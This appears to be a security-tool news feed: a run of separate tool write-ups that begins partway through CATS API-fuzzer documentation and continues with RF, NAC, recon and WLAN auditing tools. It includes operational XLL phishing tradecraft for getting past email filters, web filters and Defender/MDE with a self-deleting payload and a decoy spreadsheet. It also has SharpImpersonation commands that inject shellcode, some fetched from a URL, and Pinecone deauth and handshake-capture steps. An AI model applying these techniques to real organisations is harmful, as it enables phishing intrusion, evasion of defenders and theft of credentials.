topElement: metadata
mapValues:
test: "value1"
anotherTest: "value2"

The additionalProperties element must contain the actual key-value pairs to be sent within the requests and also a top element if needed. topElement is not mandatory. The above example will output the following json (considering also the above examples):

{
"address": {
"phone": "123",
"postCode": "408",
"street": "My Street"
},
"name": "John",
"metadata": {
"test": "value1",
"anotherTest": "value2"
}
}

RefData reserved keywords

The following keywords are reserved in a reference data file: additionalProperties, topElement and mapValues.

Sending ref data for ALL paths

You can also have the ability to send the same reference data for ALL paths (just like you do with the headers). You can achieve this by using all as a key in the refData file:

all:
address#zip: 123

This will try to replace address#zip in all requests (if the field is present).

Removing fields

There are (rare) cases when some fields may not make sense together. Something like: if you send firstName and lastName, you are not allowed to also send name. As OpenAPI does not have the capability to send request fields which are dependent on each other, you can use the refData file to instruct CATS to remove fields before sending a request to the service. You can achieve this by using the cats_remove_field as a value for the fields you want to remove. For the above case the refData field will look as follows:

all:
name: "cats_remove_field"

Creating a Ref Data file with the FunctionalFuzzer

You can leverage the fact that the FunctionalFuzzer can run functional flows in order to create dynamic --refData files which won't need manual setting the reference data values. The --refData file must be created with variables ${variable} instead of fixed values and those variables must be output variables in the functionalFuzzer.yml file. In order for the FunctionalFuzzer to properly replace the variables names with their values you must supply the --refData file as an argument when the FunctionalFuzzer runs.

> cats run functionalFuzzer.yml -c contract.yml -s http://localhost:8080 --refData=refData.yml

The functionalFuzzer.yml file:

/pet:
test_1:
description: Create a Pet
httpMethod: POST
name: "My Pet"
expectedResponseCode: 200
output:
petId: pet#id

The refData.yml file:

/pet-type:
id: ${petId}

After running CATS using the command and the 2 files above, you will get a refData_replace.yml file where the id will get the value returned into the petId variable.

The refData_replaced.yml:

/pet-type:
id: 123

You can now use the refData_replaced.yml as a --refData file for running CATS with the rest of the Fuzzers.

Headers File

This can be used to send custom fixed headers with each payload. It is useful when you have authentication tokens you want to use to authenticate the API calls. You can use path specific headers or common headers that will be added to each call using an all element. Specific paths will take precedence over the all element. Sample headers file:

all:
Accept: application/json
/path/0.1/auth:
jwt: XXXXXXXXXXXXX
/path/0.2/cancel:
jwt: YYYYYYYYYYYYY

This will add the Accept header to all calls and the jwt header to the specified paths. You can use environment (system) variables in a headers file using: $$VARIABLE_NAME. (notice double $$)

DELETE requests

DELETE is the only HTTP verb that is intended to remove resources and executing the same DELETE request twice will result in the second one to fail as the resource is no longer available. It will be pretty heavy to supply a large list of identifiers within the --refData file and this is why the recommendation was to skip the DELETE method when running CATS.

But starting with version 7.0.2 CATS has some intelligence in dealing with DELETE. In order to have enough valid entities CATS will save the corresponding POST requests in an internal Queue, and everytime a DELETE request it will be executed it will poll data from there. In order to have this actually working, your contract must comply with common sense conventions:

  • the DELETE path is actually the POST path plus an identifier: if POST is /pets, then DELETE is expected to be /pets/{petId}.
  • CATS will try to match the {petId} parameter within the body returned by the POST request while doing various combinations of the petId name. It will try to search for the following entries: petId, id, pet-id, pet_id with different cases.
  • If any of those entries is found within a stored POST result, it will replace the {petId} with that value

For example, suppose that a POST to /pets responds with:

{
"pet_id": 2,
"name": "Chuck"
}

When doing a DELETE request, CATS will discover that {petId} and pet_id are used as identifiers for the Pet resource, and will do the DELETE at /pets/2.

If these conventions are followed (which also align to good REST naming practices), it is expected that DELETE and POSTrequests will be on-par for most of the entities.

Content Negotiation

Some APIs might use content negotiation versioning which implies formats like application/v11+json in the Accept header.

You can handle this in CATS as follows:

  • if the OpenAPI contract defines its content as:
 requestBody:
required: true
content:
application/v5+json:
schema:
$ref: '#/components/RequestV5'
application/v6+json:
schema:
$ref: '#/components/RequestV6'

by having clear separation between versions, you can pass the --contentType argument with the version you want to test: cats ... --contentType="application/v6+json".

If the OpenAPI contract is not version aware (you already exported it specific to a version) and the content looks as:

 requestBody:
required: true
content:
application/json:
schema:
$ref: '#/components/RequestV5'

and you still need to pass the application/v5+json Accept header, you can use the --headers file to add it:

all:
Accept: "application/v5+json"

Edge Spaces Strategy

There isn't a consensus on how you should handle situations when you trail or prefix valid values with spaces. One strategy will be to have the service trimming spaces before doing the validation, while some other services will just validate them as they are. You can control how CATS should expect such cases to be handled by the service using the --edgeSpacesStrategy argument. You can set this to trimAndValidate or validateAndTrim depending on how you expect the service to behave:

  • trimAndValidate means that the service will first trim the spaces and after that run the validation
  • validateAndTrim means that the service runs the validation first without any trimming of spaces

This is a global setting i.e. configured when CATS starts and all Fuzzer expects a consistent behaviour from all the service endpoints.

URL Parameters

There are cases when certain parts of the request URL are parameterized. For example a case like: /{version}/pets. {version} is supposed to have the same value for all requests. This is why you can supply actual values to replace such parameters using the --urlParams argument. You can supply a ; separated list of name:value pairs to replace the name parameters with their corresponding value. For example supplying --urlParams=version:v1.0 will replace the version parameter from the above example with the value v1.0.

Dealing with AnyOf, AllOf and OneOf

CATS also supports schemas with oneOf, allOf and anyOf composition. CATS wil consider all possible combinations when creating the fuzzed payloads.

Dynamic values in configuration files

The following configuration files: securityFuzzerFile, functionalFuzzerFile, refData support setting dynamic values for the inner fields. For now the support only exists for java.time.* and org.apache.commons.lang3.*, but more types of elements will come in the near future.

Let's suppose you have a date/date-time field, and you want to set it to 10 days from now. You can do this by setting this as a value T(java.time.OffsetDateTime).now().plusDays(10). This will return an ISO compliant time in UTC format.

A functionalFuzzer using this can look like:

/path:
testNumber:
description: Short description of the test
prop: value
prop#subprop: "T(java.time.OffsetDateTime).now().plusDays(10)"
prop7:
- value1
- value2
- value3
oneOfSelection:
element#type: "Value"
expectedResponseCode: HTTP_CODE
httpMethod: HTTP_NETHOD

You can also check the responses using a similar syntax and also accounting for the actual values returned in the response. This is a syntax than can test if a returned date is after the current date: T(java.time.LocalDate).now().isBefore(T(java.time.LocalDate).parse(expiry.toString())). It will check if the expiry field returned in the json response, parsed as date, is after the current date.

The syntax of dynamically setting dates is compliant with the Spring Expression Language specs.

Running behind proxy

If you need to run CATS behind a proxy, you can supply the following arguments: --proxyHost and --proxyPort. A typical run with proxy settings on localhost:8080 will look as follows:

> cats --contract=YAML_FILE --server=SERVER_URL --proxyHost=localhost --proxyPort=8080

Dealing with Authentication

HTTP header(s) based authentication

CATS supports any form of HTTP header(s) based authentication (basic auth, oauth, custom JWT, apiKey, etc) using the headers mechanism. You can supply the specific HTTP header name and value and apply to all endpoints. Additionally, basic auth is also supported using the --basicauth=USR:PWD argument.

One-Way or Two-Way SSL

By default, CATS trusts all server certificates and doesn't perform hostname verification.

For two-way SSL you can specify a JKS file (Java Keystore) that holds the client's private key using the following arguments:

  • --sslKeystore Location of the JKS keystore holding certificates used when authenticating calls using one-way or two-way SSL
  • --sslKeystorePwd The password of the sslKeystore
  • --sslKeyPwd The password of the private key within the sslKeystore

For details on how to load the certificate and private key into a Java Keystore you can use this guide: https://mrkandreev.name/blog/java-two-way-ssl/.

Limitations

Native Binaries

When using the native binaries (not the uberjar) there might be issues when using dynamic values in the CATS files. This is due to the fact that GraalVM only bundles whatever can discover at compile time. The following classes are currently supported:

java.util.Base64.Encoder.class, java.util.Base64.Decoder.class, java.util.Base64.class, org.apache.commons.lang3.RandomUtils.class, org.apache.commons.lang3.RandomStringUtils.class, 
org.apache.commons.lang3.DateFormatUtils.class, org.apache.commons.lang3.DateUtils.class,
org.apache.commons.lang3.DurationUtils.class, java.time.LocalDate.class, java.time.LocalDateTime.class, java.time.OffsetDateTime.class

API specs

At this moment, CATS only works with OpenAPI specs and has limited functionality using template payloads through the cats fuzz ... subcommand.

Media types and HTTP methods

The Fuzzers has the following support for media types and HTTP methods:

  • application/json and application/x-www-form-urlencoded media types only
  • HTTP methods: POST, PUT, PATCH, GET and DELETE

Additional Parameters

If a response contains a free Map specified using the additionalParameters tag CATS will issue a WARN level log message as it won't be able to validate that the response matches the schema.

Regexes within 'pattern'

CATS uses RgxGen in order to generate Strings based on regexes. This has certain limitations mostly with complex patterns.

Custom Files General Info

All custom files that can be used by CATS (functionalFuzzerFile, headers, refData, etc) are in a YAML format. When setting or getting values to/from JSON for input and/or output variables, you must use a JsonPath syntax using either # or . as separators. You can find some selector examples here: JsonPath.

Contributing

Please refer to CONTRIBUTING.md.



FISSURE - Frequency Independent SDR-based Signal Understanding and Reverse Engineering


Frequency Independent SDR-based Signal Understanding and Reverse Engineering

FISSURE is an open-source RF and reverse engineering framework designed for all skill levels with hooks for signal detection and classification, protocol discovery, attack execution, IQ manipulation, vulnerability analysis, automation, and AI/ML. The framework was built to promote the rapid integration of software modules, radios, protocols, signal data, scripts, flow graphs, reference material, and third-party tools. FISSURE is a workflow enabler that keeps software in one location and allows teams to effortlessly get up to speed while sharing the same proven baseline configuration for specific Linux distributions.

The framework and tools included with FISSURE are designed to detect the presence of RF energy, understand the characteristics of a signal, collect and analyze samples, develop transmit and/or injection techniques, and craft custom payloads or messages. FISSURE contains a growing library of protocol and signal information to assist in identification, packet crafting, and fuzzing. Online archive capabilities exist to download signal files and build playlists to simulate traffic and test systems.

The friendly Python codebase and user interface allows beginners to quickly learn about popular tools and techniques involving RF and reverse engineering. Educators in cybersecurity and engineering can take advantage of the built-in material or utilize the framework to demonstrate their own real-world applications. Developers and researchers can use FISSURE for their daily tasks or to expose their cutting-edge solutions to a wider audience. As awareness and usage of FISSURE grows in the community, so will the extent of its capabilities and the breadth of the technology it encompasses.


Getting Started

Supported

There are two branches within FISSURE to make file navigation easier and reduce code redundancy. The Python2_maint-3.7 branch contains a codebase built around Python2, PyQt4, and GNU Radio 3.7; while the Python3_maint-3.8 branch is built around Python3, PyQt5, and GNU Radio 3.8.

Operating System FISSURE Branch
Ubuntu 18.04 (x64) Python2_maint-3.7
Ubuntu 18.04.5 (x64) Python2_maint-3.7
Ubuntu 18.04.6 (x64) Python2_maint-3.7
Ubuntu 20.04.1 (x64) Python3_maint-3.8
Ubuntu 20.04.4 (x64) Python3_maint-3.8

In-Progress (beta)

Operating System FISSURE Branch
Ubuntu 22.04 (x64) Python3_maint-3.8

Note: Certain software tools do not work for every OS. Refer to Software And Conflicts

Installation

git clone https://github.com/ainfosec/fissure.git
cd FISSURE
git checkout <Python2_maint-3.7> or <Python3_maint-3.8>
./install

This will automatically install PyQt software dependencies required to launch the installation GUIs if they are not found.

Next, select the option that best matches your operating system (should be detected automatically if your OS matches an option).


Python2_maint-3.7 Python3_maint-3.8

It is recommended to install FISSURE on a clean operating system to avoid existing conflicts. Select all the recommended checkboxes (Default button) to avoid errors while operating the various tools within FISSURE. There will be multiple prompts throughout the installation, mostly asking for elevated permissions and user names. If an item contains a "Verify" section at the end, the installer will run the command that follows and highlight the checkbox item green or red depending on if any errors are produced by the command. Checked items without a "Verify" section will remain black following the installation.


Usage

fissure

Refer to the FISSURE Help menu for more details on usage.

Details

Components

  • Dashboard
  • Central Hub (HIPRFISR)
  • Target Signal Identification (TSI)
  • Protocol Discovery (PD)
  • Flow Graph & Script Executor (FGE)


Capabilities

Signal Detector



IQ Manipulation


Signal Lookup


Pattern Recognition


Attacks


Fuzzing


Signal Playlists


Image Gallery


Packet Crafting


Scapy Integration


CRC Calculator


Logging


Lessons

FISSURE comes with several helpful guides to become familiar with different technologies and techniques. Many include steps for using various tools that are integrated into FISSURE.

  • Lesson1: OpenBTS
  • Lesson2: Lua Dissectors
  • Lesson3: Sound eXchange
  • Lesson4: ESP Boards
  • Lesson5: Radiosonde Tracking
  • Lesson6: RFID
  • Lesson7: Data Types
  • Lesson8: Custom GNU Radio Blocks
  • Lesson9: TPMS
  • Lesson10: Ham Radio Exams
  • Lesson11: Wi-Fi Tools

Roadmap

  • Add more hardware types, RF protocols, signal parameters, analysis tools
  • Support more operating systems
  • Create a signal conditioner, feature extractor, and signal classifier with selectable AI/ML techniques
  • Develop class material around FISSURE (RF Attacks, Wi-Fi, GNU Radio, PyQt, etc.)
  • Transition the main FISSURE components to a generic sensor node deployment scheme

Contributing

Suggestions for improving FISSURE are strongly encouraged. Leave a comment in the Discussions page if you have any thoughts regarding the following:

  • New feature suggestions and design changes
  • Software tools with installation steps
  • New lessons or additional material for existing lessons
  • RF protocols of interest
  • More hardware and SDR types for integration
  • IQ analysis scripts in Python
  • Installation corrections and improvements

Contributions to improve FISSURE are crucial to expediting its development. Any contributions you make are greatly appreciated. If you wish to contribute through code development, please fork the repo and create a pull request:

  1. Fork the project
  2. Create your feature branch (git checkout -b feature/AmazingFeature)
  3. Commit your changes (git commit -m 'Add some AmazingFeature')
  4. Push to the branch (git push origin feature/AmazingFeature)
  5. Open a pull request

Creating Issues to bring attention to bugs is also welcomed.

Collaborating

Contact Assured Information Security, Inc. (AIS) Business Development to propose and formalize any FISSURE collaboration opportunitiesโ€“whether that is through dedicating time towards integrating your software, having the talented people at AIS develop solutions for your technical challenges, or integrating FISSURE into other platforms/applications.

License

GPL-3.0

For license details, see LICENSE file.

Contact

Follow on Twitter: @FissureRF, @AinfoSec

Chris Poore - Assured Information Security, Inc. - poorec@ainfosec.com

Business Development - Assured Information Security, Inc. - bd@ainfosec.com

Acknowledgments

Special thanks to Dr. Samuel Mantravadi and Joseph Reith for their contributions to this project.



DeathSleep - A PoC Implementation For An Evasion Technique To Terminate The Current Thread And Restore It Before Resuming Execution, While Implementing Page Protection Changes During No Execution


A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.


Intro

Sleep and obfuscation methods are well known in the maldev community, with different implementations, they have the objective of hiding from memory scanners while sleeping, usually changing page protections and even adding cool features like encrypting the shellcode, but there is another important point to hide our shellcode, and is hiding the current execution thread. Spoofing the stack is cool, but after thinking a little about it I thought that there is no need to spoof the stackโ€ฆ if there is no stack :)

The usability of this technique is left to the reader to assess, but in any case, I think it is a cool way to review some topics, and learn some maldev for those who, like me, are starting in this world.

The main implementation showed here holds everything that we need to take out of the stack in the data section, as global variables, but an impletementation moving everything to the heap will be published soon. It aims to show some key modifications that needs to be done to make this code pic and injectable.

This repository is mirrored between GitHub and GitLab.



Packet Fence 12.0.0

PacketFence is a network access control (NAC) system. It is actively maintained and has been deployed in numerous large-scale institutions. It can be used to effectively secure networks, from small to very large heterogeneous networks. PacketFence provides NAC-oriented features such as registration of new network devices, detection of abnormal network activities including from remote snort sensors, isolation of problematic devices, remediation through a captive portal, and registration-based and scheduled vulnerability scans.

XLL_Phishing - XLL Phishing Tradecraft


With Microsoft's recent announcement regarding the blocking of macros in documents originating from the internet (email AND web download), attackers have began aggressively exploring other options to achieve user driven access (UDA). There are several considerations to be weighed and balanced when looking for a viable phishing for access method:

  1. Complexity - The more steps that are required on the user's part, the less likely we are to be successful.
  2. Specificity - Are most victim machines susceptible to your attack? Is your attack architecture specific? Does certain software need to be installed?
  3. Delivery - Are there network/policy mitigations in place on the target network that limit how you could deliver your maldoc?
  4. Defenses - Is application whitelisting enforced?
  5. Detection - What kind of AV/EDR is the client running?

These are the major questions, however there are certainly more. Things get more complex as you realize that these factors compound each other; for example, if a client has a web proxy that prohibits the download of executables or DLL's, you may need to stick your payload inside a container (ZIP, ISO, etc). Doing so can present further issues down the road when it comes to detection. More robust defenses require more complex combinations of techniques to defeat.

This article will be written with a fictional target organization in mind; this organization has employed several defensive measures including email filtering rules, blacklisting certain file types from being downloaded, application whitelisting on endpoints, and Microsoft Defender for Endpoint as an EDR solution.

Real organizations may employ none of these, some, or even more defenses which can simplify or complicate the techniques outlined in this research. As always, know your target.


What are XLL's?

XLL's are DLL's, specifically crafted for Microsoft Excel. To the untrained eye they look a lot like normal excel documents.


XLL's provide a very attractive option for UDA given that they are executed by Microsoft Excel, a very commonly encountered software in client networks; as an additional bonus, because they are executed by Excel, our payload will almost assuredly bypass Application Whitelisting rules because a trusted application (Excel) is executing it. XLL's can be written in C, C++, or C# which provides a great deal more flexibility and power (and sanity) than VBA macros which further makes them a desirable choice.

The downside of course is that there are very few legitimate uses for XLL's, so it SHOULD be a very easy box to check for organizations to block the download of that file extension through both email and web download. Sadly many organizations are years behind the curve and as such XLL's stand to be a viable method of phishing for some time.

There are a series of different events that can be used to execute code within an XLL, the most notable of which is xlAutoOpen. The full list may be seen here:


Upon double clicking an XLL, the user is greeted by this screen:


This single dialog box is all that stands between the user and code execution; with fairly thin social engineering, code execution is all but assured.

Something that must be kept in mind is that XLL's, being executables, are architecture specific. This means that you must know your target; the version of Microsoft Office/Excel that the target organization utilizes will (usually) dictate what architecture you need to build your payload for.

There is a pretty clean break in Office versions that can be used as a rule of thumb:

Office 2016 or earlier: x86

Office 2019 or later: x64

It should be noted that it is possible to install the other architecture for each product, however these are the default architectures installed and in most cases this should be a reliable way to make a decision about which architecture to roll your XLL for. Of course depending on the delivery method and pretexting used as part of the phishing campaign, it is possible to provide both versions and rely on the victim to select the appropriate version for their system.

Resources

The XLL payload that was built during this research was based on this project by edparcell. His repository has good instructions on getting started with XLL's in Visual Studio, and I used his code as a starting point to develop a malicious XLL file.

A notable deviation from his repository is that should you wish to create your own XLL project, you will need to download the latest Excel SDK and then follow the instructions on the previously linked repo using this version as opposed to the 2010 version of the SDK mentioned in the README.

Delivery

Delivery of the payload is a serious consideration in context of UDA. There are two primary methods we will focus on:

  1. Email Attachment
  2. Web Delivery

Email Attachment

Either via attaching a file or including a link to a website where a file may be downloaded, email is a critical part of the UDA process. Over the years many organizations (and email providers) have matured and enforced rules to protect users and organizations from malicious attachments. Mileage will vary, but organizations now have the capability to:

  1. Block executable attachments (EXE, DLL, XLL, MZ headers overall)
  2. Block containers like ISO/IMG which are mountable and may contain executable content
  3. Examine zip files and block those containing executable content
  4. Block zip files that are password protected
  5. More

Fuzzing an organization's email rules can be an important part of an engagement, however care must always be taken so as to not tip one's hand that a Red Team operation is ongoing and that information is actively being gathered.

For the purposes of this article, it will be assumed that the target organization has robust email attachment rules that prevent the delivery of an XLL payload. We will pivot and look at web delivery.

Web Delivery

Email will still be used in this attack vector, however rather than sending an attachment it will be used to send a link to a website. Web proxy rules and network mitigations controlling allowed file download types can differ from those enforced in regards to email attachments. For the purposes of this article, it is assumed that the organization prevents the download of executable files (MZ headers) from the web. This being the case, it is worth exploring packers/containers.

The premise is that we might be able to stick our executable inside another file type and smuggle it past the organization's policies. A major consideration here is native support for the file type; 7Z files for example cannot be opened by Windows without installing third party software, so they are not a great choice. Formats like ZIP, ISO, and IMG are attractive choices because they are supported natively by Windows, and as an added bonus they add very few extra steps for the victim.

The organization unfortunately blocks ISO's and IMG's from being downloaded from the web; additionally, because they employ Data Loss Prevention (DLP) users are unable to mount external storage devices, which ISO's and IMG's are considered.

Luckily for us, even though the organization prevents the download of MZ-headered files, it does allow the download of zip files containing executables. These zip files are actively scanned for malware, to include prompting the user for the password for password-protected zip files; however because the executable is zipped it is not blocked by the otherwise blanket deny for MZ files.

Zip files and execution

Zip files were chosen as a container for our XLL payload because:

  1. They are natively compatible with Windows
  2. They are allowed to be downloaded from the internet by the organization
  3. They add very little additional complexity to the attack

Conveniently, double clicking a ZIP file on Windows will open that zip file in File Explorer:

ย 

Less conveniently, double clicking the XLL file from the zipped location triggers Windows Defender; even using the stock project from edparcell that doesn't contain any kind of malicious code.

ย 

Looking at the Windows Defender alert we see it is just a generic "Wacatac" alert:


However there is something odd; the file it identified as malicious was in c:\users\user\Appdata\Local\Temp\Temp1_ZippedXLL.zip, not C:\users\user\Downloads\ZippedXLL\ where we double clicked it. Looking at the Excel instance in ProcessExplorer shows that Excel is actually running the XLL from appdata\local\temp, not from the ZIP file that it came in:

ย 

This appears to be a wrinkle associated with ZIP files, not XLL's. Opening a TXT file from within a zip using notepad also results in the TXT file being copied to appdata\local\temp and opened from there. While opening a text file from this location is fine, Defender seems to identify any sort of actual code execution in this location as malicious.

If a user were to extract the XLL from the ZIP file and then run it, it will execute without any issue; however there is no way to guarantee that a user does this, and we really can't roll the dice on popping AV/EDR should they not extract it. Besides, double clicking the ZIP and then double clicking the XLL is far simpler and a victim is far more prone to complete those simple actions than go to the trouble of extracting the ZIP.

This problem caused me to begin considering a different payload type than XLL; I began exploring VSTO's, which are Visual Studio Templates for Office. I highly encourage you to check out that article.

VSTO's ultimately call a DLL which can either be located locally with the .XLSX that initiates everything, or hosted remotely and downloaded by the .XLSX via http/https. The local option provides no real advantages (and in fact several disadvantages in that there are several more files associated with a VSTO attack), and the remote option unfortunately requires a code signing certificate or for the remote location to be a trusted network. Not having a valid code signing cert, VSTO's do not mitigate any of the issues in this scenario that our XLL payload is running into.

We really seem to be backed into a corner here. Running the XLL itself is fine, however the XLL cannot be delivered by itself to the victim either via email attachment or web download due to organization policy. The XLL needs to be packaged inside a container, however due to DLP formats like ISO, IMG, and VHD are not viable. The victim needs to be able to open the container natively without any third party software, which really leaves ZIP as the option; however as discussed, running the XLL from a zipped folder results in it being copied and ran from appdata\local\temp which flags AV.

I spent many hours brain storming and testing things, going down the VSTO rabbit hole, exploring all conceivable options until I finally decided to try something so dumb it just might work.

This time I created a folder, placed the XLL inside it, and then zipped the folder:

ย 

Clicking into the folder reveals the XLL file:


Double clicking the XLL shows the Add-In prompt from Excel. Note that the XLL is still copied to appdata\local\temp, however there is an additional layer due to the extra folder that we created:

ย 

Clicking enable executes our code without flagging Defender:


Nice! Code execution. Now what?

Tradecraft

The pretexting involved in getting a victim to download and execute the XLL will vary wildly based on the organization and delivery method; themes might include employee salary data, calculators for compensation based on skillset, information on a project, an attendee roster for an event, etc. Whatever the lure, our attack will be a lot more effective if we actually provide the victim with what they have been promised. Without follow through, victims may become suspicious and report the document to their security teams which can quickly give the attacker away and curtail access to the target system.

The XLL by itself will just leave a blank Excel window after our code is done executing; it would be much better for us to provide the Excel Spreadsheet that the victim is looking for.

We can embed our XLSX as a byte array inside the XLL; when the XLL executes, it will drop the XLSX to disk beside the XLL after which it will be opened. We will name the XLSX the same as the XLL, the only difference being the extension.

Given that our XLL is written in C, we can bring in some of the capabilities from a previous writeup I did on Payload Capabilities in C, namely Self-Deletion. Combining these two techniques results in the XLL being deleted from disk, and the XLSX of the same name being dropped in it's place. To the undiscerning eye, it will appear that the XLSX was there the entire time.

Unfortunately the location where the XLL is deleted and the XLSX dropped is the appdata\temp\local folder, not the original ZIP; to address this we can create a second ZIP containing the XLSX alone and also read it into a byte array within the XLL. On execution in addition to the aforementioned actions, the XLL could try and locate the original ZIP file in c:\users\victim\Downloads\ and delete it before dropping the second ZIP containing just the XLSX in it's place. This could of course fail if the user saved the original ZIP in a different location or under a different name, however in many/most cases it should drop in the user's downloads folder automatically.


This screenshot shows in the lower pane the temp folder created in appdata\local\temp containing the XLL and the dropped XLSX, while the top pane shows the original File Explorer window from which the XLL was opened. Notice in the lower pane that the XLL has size 0. This is because it deleted itself during execution, however until the top pane is closed the XLL file will not completely disappear from the appdata\local\temp location. Even if the victim were to click the XLL again, it is now inert and does not really exist.

Similarly, as soon as the victim backs out of the opened ZIP in File Explorer (either by closing it or navigating to a different folder), should they click spreadsheet.zip again they will now find that the test folder contains importantdoc.xlsx; so the XLL has been removed and replaced by the harmless XLSX in both locations that it existed on disk.

This GIF demonstrates the download and execution of the XLL on an MDE trial VM. Note that for some reason Excel opens two instances here; on my home computer it only opened one, so not quite sure why that differs.


Detection

As always, we will ask "What does MDE see?"

A quick screenshot dump to prove that I did execute this on target and catch a beacon back on TestMachine11:



ย 

First off, zero alerts:


What does the timeline/event log capture?


Yikes. Truth be told I have no idea where the keylogging, encrypting, and decrypting credentials alerts are coming from as my code doesn't do any of that. Our actions sure look suspicious when laid out like this, but I will again comment on just how much data is collected by MDE on a single endpoint, let alone hundreds, thousands, or hundreds of thousands that an organization may have hooked into the EDR. So long as we aren't throwing any actual alerts, we are probably ok.

Code Sample

The moment most have probably been waiting for, I am providing a code sample of my developed XLL runner, limited to just those parts discussed here in the Tradecraft section. It will be on the reader to actually get the code into an XLL and implement it in conjunction with the rest of their runner. As always, do no harm, have permission to phish an organization, etc.

Compiling and setup

I have included the source code for a program that will ingest a file and produce hex which can be copied into the byte arrays defined in the snippet. Use this on the the XLSX you wish to present to the user, as well as the ZIP file containing the folder which contains that same XLSX and store them in their respective byte arrays. Compile this code using:

gcc -o ingestfile ingestfile.c

I had some issues getting my XLL's to compile using MingW on a kali machine so thought I would post the commands here:

x64

x86_64-w64-mingw32-gcc snippet.c 2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/x64/XLCALL32.LIB -o importantdoc.xll -s -Os -DUNICODE -shared -I 2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/

x86

i686-w64-mingw32-gcc snippet.c 2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/XLCALL32.LIB -o HelloWorldXll.xll -s -DUNICODE -Os -shared -I 2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/ 

After you compile you will want to make a new folder and copy the XLL into that folder. Then zip it using:

zip -r <myzipname>.zip <foldername>/

Note that in order for the tradecraft outlined in this post to work, you are going to need to match some variables in the code snippet to what you name the XLL and the zip file.

Conclusion

With the dominance of Office Macro's coming to a close, XLL's present an attractive option for phishing campaigns. With some creativity they can be used in conjunction with other techniques to bypass many layers of defenses implemented by organizations and security teams. Thank you for reading and I hope you learned something useful!



SharpImpersonation - A User Impersonation Tool - Via Token Or Shellcode Injection


This was a learning by doing project from my side. Well known techniques are used to built just another impersonation tool with some improvements in comparison to other public tools. The code base was taken from:

A blog post for the intruduction can be found here:


List user processes

PS > PS C:\temp> SharpImpersonation.exe list


List only elevated processes

PS > PS C:\temp> SharpImpersonation.exe list elevated

Impersonate the first process of the target user to start a new binary

PS > PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>


Inject base64 encoded shellcode into the first process of the target user

PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>


Inject shellcode loaded from a webserver into the first process of the target user

PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>


Impersonate the target user via ImpersonateLoggedOnuser for the current session

PS > PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser


Faraday 4.1.0

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

SDomDiscover - A Easy-To-Use Python Tool To Perform DNS Recon



   _____ ____                  ____  _                               
/ ___// __ \____ ____ ___ / __ \(_)_____________ _ _____ _____
\__ \/ / / / __ \/ __ `__ \/ / / / / ___/ ___/ __ \ | / / _ \/ ___/
___/ / /_/ / /_/ / / / / / / /_/ / (__ ) /__/ /_/ / |/ / __/ /
/____/_____/\____/_/ /_/ /_/_____/_/____/\___/\____/|___/\___/_/

A easy-to-use python tool to perform dns recon with multiple options

Installation:

It can be installed in any OS with python3

Manual installation

git clone https://github.com/D3Ext/SDomDiscover
cd SDomDiscover
pip3 install -r requirements.txt

One-liner

git clone https://github.com/D3Ext/SDomDiscover && cd SDomDiscover && pip3 install -r requirements.txt && python3 SDomDiscover.py

Usage:

Common usages

To see the help panel and other parameters

python3 SDomDiscover.py -h

Main usage of the tool to dump the valid domains in the SSL certificate

python3 SDomDiscover.py -d example.com

Used to perform all the queries and recognizement

python3 SDomDiscover.py -d domain.com --all


Pinecone - A WLAN Red Team Framework


Pinecone is a WLAN networks auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to be run in Debian-based operating systems. Pinecone is specially oriented to be used with a Raspberry Pi, as a portable wireless auditing box.

This tool is designed for educational and research purposes only. Only use it with explicit permission.


Installation

For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, Raspberry Pi Desktop and Kali Linux). Pinecone has the following requirements:

  • Python 3.5+. Your distribution probably comes with Python3 already installed, if not it can be installed using apt-get install python3.
  • dnsmasq (tested with version 2.76). Can be installed using apt-get install dnsmasq.
  • hostapd-wpe (tested with version 2.6). Can be installed using apt-get install hostapd-wpe. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a Kali Linux repository pre-compiled package, or compile it from its source code.

After installing the necessary packages, you can install the Python packages requirements for Pinecone using pip3 install -r requirements.txt in the project root folder.

Usage

For starting Pinecone, execute python3 pinecone.py from within the project root folder:

root@kali:~/pinecone# python pinecone.py 
[i] Database file: ~/pinecone/db/database.sqlite
pinecone >

Pinecone is controlled via a Metasploit-like command-line interface. You can type help to get the list of available commands, or help 'command' to get more information about a specific command:

pinecone > help

Documented commands (type help <topic>):
========================================
alias help load pyscript set shortcuts use
edit history py quit shell unalias

Undocumented commands:
======================
back run stop

pinecone > help use
Usage: use module [-h]

Interact with the specified module.

positional arguments:
module module ID

optional arguments:
-h, --help show this help message and exit

Use the command use 'moduleID' to activate a Pinecone module. You can use Tab auto-completion to see the list of current loaded modules:

pinecone > use 
attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap
daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake
pinecone > use discovery/recon
pcn module(discovery/recon) >

Every module has options, that can be seen typing help run or run --help when a module is activated. Most modules have default values for their options (check them before running):

pcn module(discovery/recon) > help run
usage: run [-h] [-i INTERFACE]

optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --iface INTERFACE
monitor mode capable WLAN interface (default: wlan0)

When a module is activated, you can use the run [options...] command to start its functionality. The modules provide feedback of their execution state:

pcn script(attack/wpa_handshake) > run -s TEST_SSID
[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...
................................................................
Sent 64 packets.
[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...

If the module runs in background (for example, scripts/infrastructure/ap), you can stop it using the stop command when the module is running:

When you are done using a module, you can deactivate it by using the back command. You can also activate another module issuing the use command again.

Shell commands may be executed with the command shell or the ! shortcut:

pinecone > !ls
LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md

